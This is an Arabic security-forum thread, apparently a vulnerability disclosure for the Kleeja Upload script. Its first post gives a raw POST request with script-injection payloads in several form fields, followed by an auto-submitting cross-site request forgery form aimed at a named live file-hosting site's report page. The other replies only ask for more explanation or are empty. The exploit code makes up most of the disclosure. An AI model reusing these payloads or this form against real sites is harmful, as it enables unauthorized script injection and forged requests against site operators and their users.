الوسوم:
حالة الموضوع:
مغلق
  1. VeRoS_Dz

    VeRoS_Dz Developer

    الأنتساب:
    ‏10 أغسطس 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    VeRoS_Dz
    الإقامة:
    VeRoS_Dz
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    ليس متاكد من الاصدارات المصابة

    version:1.0.0

    كود PHP:
    GET http://www.gulfup.com/report
    POST :
    rname=000&rmail=00rurl="><script>alert(String.fromCharCo
    de(75,67,70))</script>&rtext="
    ><script>alert(String.fromCha
    rCode
    (75,67,70))</script>&rid="><script>alert(String.fr
    omCharCod
    e(75,67,70))</script>&k_form_key=55558640&k_form_
    time=135510&submit=  
    بعد كتابة استغلال بسيط :

    كود PHP:
    <html>
    <
    form method="post" action="http://www.gulfup.com/report">
    <
    input type="text" name="rname=" value="451"/>
    <
    input type="text" name="rmail" value="162"/>
    <
    input type="text" name="rurl" value="<script>alert(String.fromCharCode
    (75,67,70))</script>"
    />
    <
    input type="text" name="rtext" value="<script>alert(String.fromCharCode
    (75,67,70))</script>"
    />
    <
    input type="text" name="rid" value="123456"/>
    <
    script>
    document.getElementById('submit').click();
    </script>
    </form>
    </body>
    </html>
     
  2. Black-Heart

    Black-Heart V • I • P

    الأنتساب:
    ‏24 مارس 2014
    المشاركات:
    102
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الإقامة:
    أطهر البقاع
    رد: Kleeja Upload - CSRF

    ممكن توضيح أكثر ؟
     
  3. ~.O M A R.~

    ~.O M A R.~ Developer

    الأنتساب:
    ‏16 يوليو 2012
    المشاركات:
    62
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأردن
حالة الموضوع:
مغلق

مشاركة هذه الصفحة